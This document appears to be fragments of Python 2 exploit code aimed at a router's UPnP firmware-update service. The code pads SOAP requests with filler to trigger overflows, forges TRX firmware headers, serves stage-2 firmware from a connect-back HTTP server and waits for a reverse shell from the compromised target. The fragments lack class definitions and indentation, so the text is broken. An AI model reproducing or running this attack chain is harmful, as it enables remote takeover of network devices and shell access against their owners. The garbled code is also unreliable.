def main(firmware_file=None):
logger = Logging(max_level=Logging.DEBUG)
request = SetFirmwareRequest(firmware_file=firmware_file, logger=logger)
#write out the request to a file so we can easily analyze what we sent.
logger.LOG_DEBUG("Writing request to request.bin for analysis.")
open("./request.bin", "wb").write(str(request))
logger.LOG_DEBUG("Done.")
logger.LOG_INFO("Sending special UPnP request to host: %s" % HOST)
special_upnp_send(HOST, 5000, str(request))
logger.LOG_INFO("Done.")
def __init__(self,firmware_data,b64encode=True,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
self.logger=logger
logger.LOG_DEBUG("Building SetFirmware request body.")
logger.LOG_DEBUG("Length of firmware: %d" % len(firmware_data))
if b64encode:
self.encoded_firmware=base64.b64encode(firmware_data)
else:
self.encoded_firmware=firmware_data
logger.LOG_DEBUG("Length of encoded firmware: %d" % len(self.encoded_firmware))
def __init__(self,firmware_data,min_content_length,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
self.logger=logger
logger.LOG_DEBUG("Building SetFirmware request body.")
logger.LOG_DEBUG("Length of firmware: %d" % len(firmware_data))
self.encoded_firmware=base64.b64encode(firmware_data)
self.request_start="<SOAP-ENV:Body><NewFirmware>"
self.request_end="</NewFirmware></SOAP-ENV:Body>"
length=len(self.request_start)+len(self.request_end)+len(self.encoded_firmware)
padding=""
if length < min_content_length:
print "Current length is %d" % length
print "Generating %d As" %(min_content_length - length)
padding="A"*(min_content_length - length)+"FOO"
self.padding=padding
def __init__(self, logger=None):
if not logger:
logger = Logging(max_level=Logging.DEBUG)
self.request_body = "A" * self.MIN_CONTENT_LENGTH
length = len(self.request_body)
logger.LOG_DEBUG("Length of request body is: %d" % length)
self.request_headers = SetFirmwareRequestHeaders(length)
def main(stage1,stage2,docroot):
logger=Logging(max_level=Logging.DEBUG)
"""
Start servers
"""
try:
logger.LOG_INFO("Starting HTTP connect-back server.")
httpd,http_pid=do_http_connectback([stage2],HTTP_PORT,docroot,logger)
logger.LOG_INFO("HTTP server started.")
except Exception as e:
print e
sys.exit(1)
try:
logger.LOG_INFO("Starting reverse-tcp server.")
connect_back,cb_pid=do_tcp_connectback(CONNECTBACK_PORT,logger)
logger.LOG_INFO("Reverse-tcp server started.")
except Exception as e:
print e
httpd.shutdown()
sys.exit(1)
"""
Exploit UPnP
"""
try:
logger.LOG_DEBUG("Instantiating UPnP firmware exploit.")
exploit=UPNPFirmwareExploit(TARGET,UPNP_PORT,stage1,logger=logger)
logger.LOG_INFO("Sending stage 1 firmware.")
exploit.send()
logger.LOG_INFO("Done with stage 1 firmware.")
except Exception as e:
print e
traceback.print_exc()
httpd.shutdown()
connect_back.shutdown()
raise e
sys.exit(1)
"""
Wait for servers to finish.
"""
logger.LOG_INFO("Serving stage 2 firmware.")
try:
logger.LOG_INFO("Waiting for server to terminate. PID: %d" % http_pid)
httpd.wait()
except Exception as e:
logger.LOG_WARN("Error with HTTP server: %s" % str(e))
connect_back.shutdown()
httpd.shutdown()
#not sure if this is fatal or not.
#We probably killed with ctrl+c
sys.exit(1)
logger.LOG_INFO("HTTP server terminated.")
logger.LOG_INFO("Done serving with stage 2 firmware.")
logger.LOG_INFO("Waiting for incoming remote shell.")
try:
logger.LOG_INFO("Waiting for reverse-tcp server to terminate.")
connect_back.wait()
except Exception as e:
#pretty sure this happens when we ctrl+c during a reverse-tcp shell.
logger.LOG_INFO("Shutting down reverse-tcp server.")
connect_back.shutdown()
httpd.shutdown()
logger.LOG_INFO("Exploitation of %s complete." % TARGET)
httpd.shutdown()
connect_back.shutdown()
sys.exit(0)
def __init__(self, input_files, endianness, logger=None):
if not logger:
logger = Logging(max_level=Logging.DEBUG)
cls = self.__class__
self.endianness = endianness
if len(input_files) < 1 or len(input_files) > 3:
raise TrxHeaderException(
"Must have at least one input file and not more than 3.")
partitions = []
total_size = cls.TRX_HEADER_SIZE
offsets = [0, 0, 0]
i = 0
for file in input_files:
data = open(file, "rb").read()
offsets[i] = total_size
total_size += len(data)
partitions.append(data)
i += 1
sc = SectionCreator(self.endianness)
sc.string_section(cls.TRX_MAGIC_OFFSET,
cls.TRX_MAGIC,
description="TRX magic bytes.")
sc.gadget_section(cls.TRX_SIZE_OFFSET,
total_size,
description="Total size of trx+data.")
version_flags = self._make_version_flags(cls.TRX_FLAGS,
cls.TRX_VERSION)
sc.string_section(cls.TRX_FLAGS_OFFSET,
version_flags,
description="TRX flags & version.")
partition_offset = offsets[0]
sc.gadget_section(cls.TRX_PART_1_OFFSET,
partition_offset,
description="Offset of partition 1.")
partition_offset = offsets[1]
sc.gadget_section(cls.TRX_PART_2_OFFSET,
partition_offset,
description="Offset of partition 2.")
partition_offset = offsets[2]
sc.gadget_section(cls.TRX_PART_3_OFFSET,
partition_offset,
description="Offset of partition 3.")
pre_checksum_header = OverflowBuffer(self.endianness,
cls.TRX_HEADER_SIZE,
sc.section_list)
data = str(pre_checksum_header)
data = data[cls.TRX_FLAGS_OFFSET:]
data += "".join(partitions)
crc = CRC32(data).crc
logger.LOG_DEBUG("TRX crc32: 0x%08x" % crc)
sc.gadget_section(cls.TRX_CRC32_OFFSET,
crc,
description="crc32 of header+data.")
trx_header = OverflowBuffer(self.endianness, cls.TRX_HEADER_SIZE,
sc.section_list)
self.trx_header = str(trx_header)